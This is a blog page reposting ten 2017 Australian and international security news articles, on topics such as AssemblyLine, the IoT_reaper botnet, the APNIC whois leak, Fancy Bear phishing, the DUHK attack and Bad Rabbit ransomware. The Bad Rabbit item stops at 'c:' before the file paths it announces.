Updates from December, 2017 Toggle Comment Threads | Keyboard Shortcuts

  • jkabtech 4:17 am on December 12, 2017 Permalink | Reply
    Tags: , anti-malware, Canadian, , spooks   

    Canadian govt spooks open source anti-malware analytics tool 

    Follow Five-Eye partner agencies.

    Canada’s main signals intelligence agency has released the code for a malware scanner and analytics tool as open source. 

    The Communications Security Establishment (CSE) said the AssemblyLine tool is designed to analyse large volumes of files, and can automatically rebalance workloads.

    Each file is tagged with a unique identifier, and passed through user-defined analytics engines that attempt to assess how malicious the code is, with a score assigned for that purpose.

    It can use popular anti-virus utilities such as McAfee, Kaspersky, F-Secure, and BitDefender. AssemblyLine can also connect the VirusTotal aggregate anti-virus scanning service using an application programming key, among others.

    Files that are identified as malicious can be passed to other defensive systems, the CSE said.

    The intention behind AssemblyLine is to free up analysts from having to manually inspect most files, allowing them instead to focus on incoming malware.

    By releasing it as ffree and open source, the CSE hopes the infosec community will further develop the tool and create new methods to detect malicious files.

    The source code for AssemblyLine can be found on Atlassian’s Bitbucket repository for registered users.

    AssemblyLine was built with public domain and open source software by the CSE, with no commercial, proprietary technology. 

    The US National Security Agency (NSA) has also publicly released several infosec tools, including Secure Extensions for Linux (SELinux), which are widely used.

    Britain’s Government Communications Headquarters (GCHQ) also releases tools to the public, and maintains a code repository on Github for that purpose.

    View the Original article

    Advertisements
     
  • jkabtech 8:17 pm on December 11, 2017 Permalink | Reply
    Tags: Govpass, , , undecided   

    DTA undecided on sole identity provider for Govpass 

    Yet to task single agency with responsibility.

    The Digital Transformation Agency is yet to decide which agency will be entrusted as the federal government’s sole identity provider for the whole-of-gov Govpass digital identity platform even as testing of the new verifier begins.

    The decision to select a single identity provider at the federal level was revealed earlier this year, despite criticism from stakeholders who viewed the centralised model as reminiscent of the failed Australia Card proposal.

    One of the reasons the DTA gave for this in Govpass’ initial privacy impact assessment was that it would allow security efforts to be focused in “one place instead of having to fund separate teams maintaining multiple instances”.

    The single provider of identity for government would be responsible for new digital identitiers as well as existing ones that would be migrated across from other services.

    It would use the identity exchange technology built by the DTA, dubbed the ‘Exchange Hub’, to allow other agencies to verify details about a citizen’s identity without accumulating personal data.

    However, while the agency has not altered its approach in the intervening months, a spokesperson told iTnews no decision had yet been made on who would become the government’s single identity provider.

    But it has whittled the choice down to the ATO and DHS – who both already provide whole-of-government identity services – as well as the Attorney-General’s Department and Department of Industry, Innovation and Science, which the agency says it is working closely with on the “next steps” of the digital identity platform.

    The ATO has already begun testing Govpass on its new online tax file number application service – a process that is currently only possible by visiting an Australia Post or Centrelink shopfront or by posting documents to the ATO, and takes around 40 days to complete.

    The digital identity is also understood to be under testing with a small number of other services, but the DTA spokesperson would not provide detail. The agency will use the private beta phase to add new features and functionality to the platform, while fixing any issues and integrating it with other services.

    Several state government agencies and private sector entities are also expected to add to Govpass, and Australia Post has indicated it will seek accreditation to be the first identity provider outside of the Commonwealth, the DTA spokesperson revealed.

    AusPost partnered with the DTA in May to tack its Digital ID identification verification service onto GovPass.

    How Govpass will work?

    A first look at how citizens will apply for the optional digital identity was outlined in a DTA video last week, which showcased the front-end of what will replace the more than 30 separate logins currently used to access federal government digital services.

    “I would like to see a point where we can do away with all those usernames and passwords, that need to continue to be updated, when you login to a service,” digital transformation minister Angus Taylor said.

    Govpass will require citizens to provide either a birth certificate, passport or drivers licence and a Medicare card – or the same documentation required for a 100 point identity check – in addition to completing a two-factor authentication process to confirm their identity.

    The personal documents are verified in real time with the department that has responsibility for the credential – such as the Department of Human Services for Medicare cards and the Department of Foreign Affairs and Trade for passports – using the document verification service.

    Govpass will also be capable of accessing the camera on a user’s device to confirm the image against a passport or drivers licence using the one-to-one image matching service known as the face verification service (FVS).

    This will include liveness tests to prevent against an individual using another person’s photograph, the DTA spokesperson said.

    The government also expects the digital identity to be used to access services at other levels of government as well as within the private sector over time.

    View the Original article

     
  • jkabtech 12:17 pm on December 11, 2017 Permalink | Reply
    Tags: , copycat, ,   

    New Mirai copycat IoT botnet spreading 

    Code being actively modified.

    Security researchers have warned that a new worm attacking internet-connected and vulnerable devices is currently spreading throughout the world.

    Dubbed IoT_reaper by Chinese security vendor Qihoo 360, the malware was first spotted in September this year and has been spreading since then.

    The vendor said it had found more than 10,000 unique IP addresses per day with devices that have been compromised by the malware, along with more than two million systems queued at the command and control servers Qihoo 360 is tracking.

    The malware is based on the Mirai internet of things (IoT) worm that struck last year, and which has been used to compromise millions of unpatched, vulnerable devices connected to the internet around the world.

    However, IoT_reaper differs from Mirai in that it doesn’t attempt to crack weak device passwords – it only tries to exploit vulnerabilities.

    It also doesn’t exhibit aggressive scanning so as to stay unnoticed, and it comes with an execution environment for the lightweight Lua scripting language so as to enable more complex attacks, the researchers said.

    IoT_reaper attacks vulnerable devices from D-Link, Netgear, Linksys, AVTech, Vacron, JAWS and GoAhead.

    The researchers said they have not seen the IoT_Reaper botnet being used for denial of service attacks as with Mirai.

    It does, however, contain around 100 domain name system resolvers, which can be used for DDoS amplification attacks. 

    View the Original article

     
  • jkabtech 4:17 am on December 11, 2017 Permalink | Reply
    Tags: , APNIC, credentials, , resets, spill, whois   

    APNIC resets passwords after whois credentials spill 

    Accidentally published hashed passwords.

    Regional internet registry for Australia APNIC has been forced to reset all passwords for objects in its whois database after a technical error leaked hashed authentication credentials.

    APNIC upgraded its whois database – which carries information about organisations and people who have been allocated internet-numbered networks, and who can alter the data published in it – in June this year. 

    In the process, APNIC accidentally included hashed authentication details for the whois Maintainer and Incident Response Team (IRT) objects in the database in the downloadable data feed the registry publishes.

    But the passwords were hashed with relatively weak cryptographical authentication methods such as the UNIX crypt-pw, which limits passwords to just eight characters in length. APNIC admitted there was a “possibility that passwords could have been derived from the hash if a malicious actor had the right tools”.

    If an attacker had cracked the hashes and obtained the passwords for the objects in the database, they could have altered whois details and temporarily re-routed IP-numbered networks from their owners.

    The error was only discovered this month after security researchers from eBay’s red team reported it to APNIC.

    APNIC removed the passwords from the whois data feed and reset all Maintainer and IRT passwords earlier this month.

    The registry continues to analyse its log files for network resource holder activity, and said it has not found evidence of any irregularities. 

    There is no connection between the whois Maintainer and IRT resource objects credentials leak and MyAPNIC portal login credentials; users of the latter do not need to reset their passwords.

    View the Original article

     
  • jkabtech 8:17 pm on December 10, 2017 Permalink | Reply
    Tags: fights, , promise, siege, transparency,   

    Kaspersky, under siege, fights back with transparency promise 

    Will allow independent reviews of code and business processes.

    Kaspersky Lab has announced a ‘global transparency initiative’ aimed at countering allegations the security vendor is secretly assisting Russian authorities with cyber surveillance.

    The initiative promises independent reviews of product source code, software updates, software development lifecycles, and supply chain risk mitigation strategies.

    It follows reports that Israeli counter-intelligence agencies discovered Russian spies used Kaspersky software for surveillance purposes.

    In September Kaspersky Lab products were banned from use in US government agencies, amidst concerns over Kremlin interference with the Russian security vendor.

    Kaspersky has strenuously denied that it has acted on behalf of any government.

    It has fought back to dispel the mistrust created by the allegations, which it claims have been made for political reasons.

    Founder and chief executive Eugene Kaspersky today said the transparancy initiative sought to repair the damage done by the allegations to his business.

    “Cybersecurity has no borders, but attempts to introduce national boundaries in cyberspace is counterproductive and must be stopped,” he said.

    “We need to reestablish trust in relationships between companies, governments and citizens.”

    Apart from the independent code and business process reviews – which will take place in the first quarter of next year – Kaspersky is also committing to developing additional controls for its telemetry and data gathering practices.

    Three Kaspersky ‘transparency centres’ will be set up globally sfrom next year in Asia, Europe and the United States.

    These will allow trusted Kaspersky partners to review the company’s source code, its software updates, and threat detection rules.

    Kaspersky will also bump up its bug bounty rewards to US$100,000 (A$128,000) for the worst vulnerabilities found by researchers in its products before the end of this year.

    View the Original article

     
  • jkabtech 12:17 pm on December 10, 2017 Permalink | Reply
    Tags: , , flyer,   

    NATO cyber conference flyer used as phishing bait 

    “Fancy Bear” APT targets high-ranking officials.

    Nationstate actors are attempting to plant malware on targets’ computers via an invitation to a NATO-organised cyber security conference, researchers have found.

    Cisco’s Talos security research division discovered a new phishing campaign from advanced persistent threat (APT) actors Group 74 – also known as Fancy Bear, APT28, Sofacy and Tsar Team – containing a malicious Microsoft Word document.

    Talos said the document contains information about the CyCon US conference on cyber conflict in Washington DC, copied from the meeting’s official website. CyCon is held by the US Army’s Cyber Institute and the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

    The document was sent out to specific targets, Talos said, and contains a macro written in Visual Basic for Applications (VBA), but no Office exploits or zero-days.

    If executed, the VBA macro attempts to drop and run a new variant of the Seduploader malware on targets’ machines.

    Seduploader is a “reconnaissance malware” that has been used by Group 74/Fancy Bear for several years.

    The malware can take screenshots, capture and exfiltrate data and system configuration information, run code, and download files.

    “This is clearly an attempt to exploit the credibility of Army Cyber Institute and NATO CCDCOE in order to target high-ranking officials and experts of cyber security,” the NATO CCDCOE said.

    It warned users not to enable and run Office macros, and to handle information obtained and received via the internet with special care.

    View the Original article

     
  • jkabtech 4:17 am on December 10, 2017 Permalink | Reply
    Tags: , , Fortinet, recovers,   

    DUHK attack recovers secret keys from Fortinet devices 

    “Absurd” flaw in government-certified crypto.

    Cryptographers have devised an attack that allows the recovery of secret digital keys from network devices and therefore full, silent interception of traffic.

    Researchers Nadia Heninger, Shaanan Cohen and Matthew Green from the John Hopkins University found that devices using the American National Standards Institute X9.31-based pseudo-random number generator (PRNG) can be reliably attacked to guess the keys used to encrypt communications.

    Although deprecated since 2016, X9.31 is still used in government-certified hardware.

    The attack – dubbed Don’t Use Hard-coded Keys, or “DUHK” – works against devices in which the X9.31 seed key is included in the implementation of the PRNG.

    If the output from the PRNG is also used to directly generate the cryptographic keys, the device in question is vulnerable to the DUHK attack.

    The attack is passive and would not be noticed by victims.

    The researchers targeted Fortinet devices running the FortiOS 4.x operating system to test their attack. They found around 25,000 Fortinet devices are vulnerable to the DUHK attack.

    While recovering the keys is time-consuming – around four minutes per connection – the researchers said the attack was practical to carry out.

    They suggested developers stop using the X9.31 PRNG.

    Fortinet has patched its device firmware in later versions of FortiOS to remove the weak X9.31 PRNG.

    View the Original article

     
  • jkabtech 8:17 pm on December 9, 2017 Permalink | Reply
    Tags: , Rabbit   

    Is Bad Rabbit the new NotPetya? 

    Malware uses legit software to encrypt disks.

    A new strain of ransomware is working its way around the globe disguised as a fake Adobe Flash player update delivered as a drive-by download.

    Dubbed Bad Rabbit, the malware is based on the destructive NotPetya ransomware that struck earlier this year, according to to Cisco’s Talos security researchers. NotPetya inflicted hundreds of millions in damages on companies including TNT Express and Maersk.

    However, major portions of the Bad Rabbit code have been rewritten, and the malware doesn’t appear to have supply chain attack capability, Talos said.

    Analysis by Google’s VirusTotal scanning system suggests the malware uses the legitimate Diskcryptor software to encrypt victims’ disks.

    The ransom to unlock the disks is set to 0.05 Bitcoin, equivalent to A$354.

    Bad Rabbit is currently spreading in Russia, Eastern Europe and Turkey.

    It can move laterally across networks and systems using a Microsoft Systems Messaging Block (SMB) module with a list of weak login credentials for brute-force guessing, as well as the mimikatz password-stealing tool. 

    The malware’s dropper, however, requires user interaction; victims need to click on the fake Flash update to start the installation.

    Security vendor ESET said Bad Rabbit had been used in an attack on major infrastructure in the Ukraine, including the public transport metro in the capital Kiev. It said it had also identified Bad Rabbit infections in Japan and Bulgaria.

    The US Computer Emergency Readiness Team (US CERT) is warning users that it has received multiple reports of Bad Rabbit ransomware infections.

    According to security researcher Amit Serper, creating two files on a Windows computer’s file system appears to stop Bad Rabbit infections.

    They are:

    c:

    View the Original article

     
  • jkabtech 12:17 pm on December 9, 2017 Permalink | Reply
    Tags: , ASD's, asked, , , mandate, strategies   

    Govt asked to mandate ASD’s ‘essential eight’ cyber strategies 

    Resiliency failures lead to calls for more action.

    The federal government has been asked to require that all 180 corporate and non-corporate Commonwealth entities implement the ASD’s ‘essential eight’ cyber security strategies by June 2018.

    A joint committee asked today for a mandate from the government that all non-corporate entities – agencies and regulators – meet the Australian Signals Directorate’s revamped ASD ‘essential eight’ strategies unveiled earlier this year.

    The committee said it was concerned about lax adoption of the previous version of the standard, the ‘top four strategies to mitigation cyber security incidents’, despite the efficacy of the controls being well-recognised in and out of government.

    Those concerns were heightened by an audit report earlier this year, which found Immigration and ATO did not comply with the ‘top four’ mitigation strategies.

    Immigration attributed its problems to complexity caused by machinery of government changes, while the ATO said it suffered compliance problems after a major IT outage.

    Both agencies have been asked to report compliance improvements to the joint committee of public accounts and audit.

    While seeking the mandate, the committee said it also noted concerns that compliance with the ‘top four’ mitigation strategies was a minimum standard and “does not necessarily equate to cyber resilience, particularly having regard to the fact that cyber resilience contemplates the likelihood that systems can and will fail”.

    “The committee considers that entities would benefit from clear guidance on the hallmarks of cyber resilience and notes that the Department of Prime Minister and Cabinet (PM&C) agreed to work with the Australian National Audit Office (ANAO) to better define these key features,” it said.

    “The committee recommends that in future audits on cyber security compliance, the ANAO outline the behaviours and practices it would expect in a cyber resilient entity, and assess against these.”

    View the Original article

     
  • jkabtech 4:17 am on December 9, 2017 Permalink | Reply
    Tags: , ,   

    ASIC skills up on data exfiltration via wi-fi 

    ‘Emerging’ vector for market crime.

    The Australian Securities and Investments Commission is investing in its capability to investigate “technology-related crime” such as unauthorised use of wi-fi to access or exfiltrate data.

    Outgoing ASIC chairman Greg Medcraft today said market crimes perpetrated with the aid of technology were an “emerging risk” and area of enforcement that the commission was looking at.

    “An emerging risk is technology-related crime where people will hack into a wireless network at a law firm to gain inside information and then potentially offer that for sale on the darknet,” Medcraft said.

    “This area of market crime is probably one that we really need to be on to going forward.

    View the Original article

     
c
Compose new post
j
Next post/Next comment
k
Previous post/Previous comment
r
Reply
e
Edit
o
Show/Hide comments
t
Go to top
l
Go to login
h
Show/Hide help
shift + esc
Cancel
%d bloggers like this: